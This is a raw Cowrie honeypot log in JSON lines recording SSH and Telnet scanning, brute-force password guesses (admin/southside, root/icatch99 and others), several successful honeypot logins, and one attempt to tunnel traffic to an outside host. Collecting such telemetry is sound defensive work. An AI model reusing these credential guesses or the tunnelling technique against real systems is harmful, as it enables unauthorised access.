{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T07:25:17.961193Z","src_ip":"212.227.235.229","session":"e7df4b2d9859"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T07:25:18.559097Z","src_ip":"212.227.235.229","session":"e7df4b2d9859"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:25:19.690020Z","src_ip":"212.227.235.229","session":"e7df4b2d9859"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":52203,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa5539878121","protocol":"ssh","message":"New connection: 80.94.95.112:52203 (1.2.3.4:22) [session: aa5539878121]","sensor":"my-vps","timestamp":"2025-08-26T07:25:27.503419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T07:25:27.504523Z","src_ip":"80.94.95.112","session":"aa5539878121"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T07:25:27.535308Z","src_ip":"80.94.95.112","session":"aa5539878121"}
{"eventid":"cowrie.login.failed","username":"admin","password":"southside","message":"login attempt [admin/southside] failed","sensor":"my-vps","timestamp":"2025-08-26T07:25:27.742890Z","src_ip":"80.94.95.112","session":"aa5539878121"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sonny1","message":"login attempt [admin/sonny1] failed","sensor":"my-vps","timestamp":"2025-08-26T07:25:28.776212Z","src_ip":"80.94.95.112","session":"aa5539878121"}
{"eventid":"cowrie.login.failed","username":"admin","password":"solnishko","message":"login attempt [admin/solnishko] failed","sensor":"my-vps","timestamp":"2025-08-26T07:25:29.808516Z","src_ip":"80.94.95.112","session":"aa5539878121"}
{"eventid":"cowrie.login.failed","username":"admin","password":"soft","message":"login attempt [admin/soft] failed","sensor":"my-vps","timestamp":"2025-08-26T07:25:30.841892Z","src_ip":"80.94.95.112","session":"aa5539878121"}
{"eventid":"cowrie.login.failed","username":"admin","password":"smokedog","message":"login attempt [admin/smokedog] failed","sensor":"my-vps","timestamp":"2025-08-26T07:25:31.876019Z","src_ip":"80.94.95.112","session":"aa5539878121"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:25:32.909240Z","src_ip":"80.94.95.112","session":"aa5539878121"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59848,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca73bdac3cd2","protocol":"ssh","message":"New connection: 217.72.205.35:59848 (1.2.3.4:22) [session: ca73bdac3cd2]","sensor":"my-vps","timestamp":"2025-08-26T07:26:29.854631Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:26:29.856638Z","src_ip":"217.72.205.35","session":"ca73bdac3cd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3250,"dst_ip":"1.2.3.4","dst_port":23,"session":"70994499d792","protocol":"telnet","message":"New connection: 212.227.235.229:3250 (1.2.3.4:23) [session: 70994499d792]","sensor":"my-vps","timestamp":"2025-08-26T07:27:36.878444Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50488,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b99250d82e9","protocol":"telnet","message":"New connection: 212.227.235.229:50488 (1.2.3.4:23) [session: 4b99250d82e9]","sensor":"my-vps","timestamp":"2025-08-26T07:27:46.627031Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T07:27:47.179013Z","src_ip":"212.227.235.229","session":"4b99250d82e9"}
{"eventid":"cowrie.session.closed","duration":2.772810220718384,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:27:49.399779Z","src_ip":"212.227.235.229","session":"4b99250d82e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50504,"dst_ip":"1.2.3.4","dst_port":23,"session":"096d208d785a","protocol":"telnet","message":"New connection: 212.227.235.229:50504 (1.2.3.4:23) [session: 096d208d785a]","sensor":"my-vps","timestamp":"2025-08-26T07:27:49.602750Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53762,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ebd2010b9a2","protocol":"telnet","message":"New connection: 212.227.125.160:53762 (1.2.3.4:23) [session: 8ebd2010b9a2]","sensor":"my-vps","timestamp":"2025-08-26T07:27:50.940867Z"}
{"eventid":"cowrie.session.closed","duration":6.386370658874512,"message":"Connection lost after 6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:27:55.989005Z","src_ip":"212.227.235.229","session":"096d208d785a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42724,"dst_ip":"1.2.3.4","dst_port":23,"session":"5dd89e174994","protocol":"telnet","message":"New connection: 212.227.235.229:42724 (1.2.3.4:23) [session: 5dd89e174994]","sensor":"my-vps","timestamp":"2025-08-26T07:27:56.191215Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:27:56.695657Z","src_ip":"212.227.235.229","session":"5dd89e174994"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:27:56.717105Z","src_ip":"212.227.235.229","session":"5dd89e174994"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T07:27:56.954780Z","src_ip":"212.227.235.229","session":"5dd89e174994"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:27:59.296971Z","src_ip":"212.227.235.229","session":"5dd89e174994"}
{"eventid":"cowrie.session.closed","duration":3.110974073410034,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:27:59.302113Z","src_ip":"212.227.235.229","session":"5dd89e174994"}
{"eventid":"cowrie.session.closed","duration":10.266138553619385,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:28:01.206938Z","src_ip":"212.227.125.160","session":"8ebd2010b9a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30749,"dst_ip":"1.2.3.4","dst_port":22,"session":"e83c2ada722d","protocol":"ssh","message":"New connection: 212.227.125.160:30749 (1.2.3.4:22) [session: e83c2ada722d]","sensor":"my-vps","timestamp":"2025-08-26T07:28:03.505255Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:28:03.506322Z","src_ip":"212.227.125.160","session":"e83c2ada722d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":31030,"dst_ip":"1.2.3.4","dst_port":22,"session":"4df53dacc199","protocol":"ssh","message":"New connection: 212.227.125.160:31030 (1.2.3.4:22) [session: 4df53dacc199]","sensor":"my-vps","timestamp":"2025-08-26T07:28:03.619276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:28:03.620072Z","src_ip":"212.227.125.160","session":"4df53dacc199"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T07:28:03.735311Z","src_ip":"212.227.125.160","session":"4df53dacc199"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:28:04.082114Z","src_ip":"212.227.125.160","session":"4df53dacc199"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T07:28:04.197732Z","session":"4df53dacc199"}
{"eventid":"cowrie.session.closed","duration":30.57096815109253,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:28:07.449339Z","src_ip":"212.227.235.229","session":"70994499d792"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47385,"dst_ip":"1.2.3.4","dst_port":22,"session":"97ba0a80ca37","protocol":"ssh","message":"New connection: 212.227.125.160:47385 (1.2.3.4:22) [session: 97ba0a80ca37]","sensor":"my-vps","timestamp":"2025-08-26T07:28:23.267473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:28:23.268199Z","src_ip":"212.227.125.160","session":"97ba0a80ca37"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T07:28:23.526803Z","src_ip":"212.227.125.160","session":"97ba0a80ca37"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:28:31.268174Z","src_ip":"212.227.125.160","session":"97ba0a80ca37"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:29:13.621898Z","src_ip":"212.227.125.160","session":"4df53dacc199"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36092,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b09ca73c473","protocol":"ssh","message":"New connection: 212.227.125.160:36092 (1.2.3.4:22) [session: 4b09ca73c473]","sensor":"my-vps","timestamp":"2025-08-26T07:30:09.238092Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:30:09.298700Z","src_ip":"212.227.125.160","session":"4b09ca73c473"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":49110,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbd2c9ebc4dd","protocol":"ssh","message":"New connection: 45.88.8.186:49110 (1.2.3.4:22) [session: cbd2c9ebc4dd]","sensor":"my-vps","timestamp":"2025-08-26T07:30:24.145541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:30:25.379723Z","src_ip":"45.88.8.186","session":"cbd2c9ebc4dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:30:25.380732Z","src_ip":"45.88.8.186","session":"cbd2c9ebc4dd"}
{"eventid":"cowrie.login.success","username":"root","password":"Pakistan1","message":"login attempt [root/Pakistan1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:30:27.742431Z","src_ip":"45.88.8.186","session":"cbd2c9ebc4dd"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:30:28.358780Z","src_ip":"45.88.8.186","session":"cbd2c9ebc4dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59858,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ec8f809dcec","protocol":"ssh","message":"New connection: 212.227.235.229:59858 (1.2.3.4:22) [session: 7ec8f809dcec]","sensor":"my-vps","timestamp":"2025-08-26T07:31:10.332314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:31:10.333483Z","src_ip":"212.227.235.229","session":"7ec8f809dcec"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T07:31:10.640925Z","src_ip":"212.227.235.229","session":"7ec8f809dcec"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:31:18.332943Z","src_ip":"212.227.235.229","session":"7ec8f809dcec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38343,"dst_ip":"1.2.3.4","dst_port":23,"session":"ffe15c6e13ac","protocol":"telnet","message":"New connection: 212.227.235.229:38343 (1.2.3.4:23) [session: ffe15c6e13ac]","sensor":"my-vps","timestamp":"2025-08-26T07:32:43.202267Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61964,"dst_ip":"1.2.3.4","dst_port":22,"session":"7232010254d0","protocol":"ssh","message":"New connection: 217.72.205.35:61964 (1.2.3.4:22) [session: 7232010254d0]","sensor":"my-vps","timestamp":"2025-08-26T07:33:08.229628Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:33:08.231814Z","src_ip":"217.72.205.35","session":"7232010254d0"}
{"eventid":"cowrie.session.closed","duration":31.44307541847229,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:33:14.645269Z","src_ip":"212.227.235.229","session":"ffe15c6e13ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27735,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ccd7badc6c2","protocol":"ssh","message":"New connection: 212.227.235.229:27735 (1.2.3.4:22) [session: 0ccd7badc6c2]","sensor":"my-vps","timestamp":"2025-08-26T07:37:25.313627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T07:37:25.314874Z","src_ip":"212.227.235.229","session":"0ccd7badc6c2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T07:37:25.425302Z","src_ip":"212.227.235.229","session":"0ccd7badc6c2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"southside","message":"login attempt [admin/southside] failed","sensor":"my-vps","timestamp":"2025-08-26T07:37:25.937622Z","src_ip":"212.227.235.229","session":"0ccd7badc6c2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sonny1","message":"login attempt [admin/sonny1] failed","sensor":"my-vps","timestamp":"2025-08-26T07:37:27.047487Z","src_ip":"212.227.235.229","session":"0ccd7badc6c2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"solnishko","message":"login attempt [admin/solnishko] failed","sensor":"my-vps","timestamp":"2025-08-26T07:37:28.159250Z","src_ip":"212.227.235.229","session":"0ccd7badc6c2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"soft","message":"login attempt [admin/soft] failed","sensor":"my-vps","timestamp":"2025-08-26T07:37:29.268283Z","src_ip":"212.227.235.229","session":"0ccd7badc6c2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"smokedog","message":"login attempt [admin/smokedog] failed","sensor":"my-vps","timestamp":"2025-08-26T07:37:30.377743Z","src_ip":"212.227.235.229","session":"0ccd7badc6c2"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:37:31.487660Z","src_ip":"212.227.235.229","session":"0ccd7badc6c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40741,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d52cdab2633","protocol":"ssh","message":"New connection: 212.227.235.229:40741 (1.2.3.4:22) [session: 1d52cdab2633]","sensor":"my-vps","timestamp":"2025-08-26T07:37:33.522609Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:37:33.523833Z","src_ip":"212.227.235.229","session":"1d52cdab2633"}
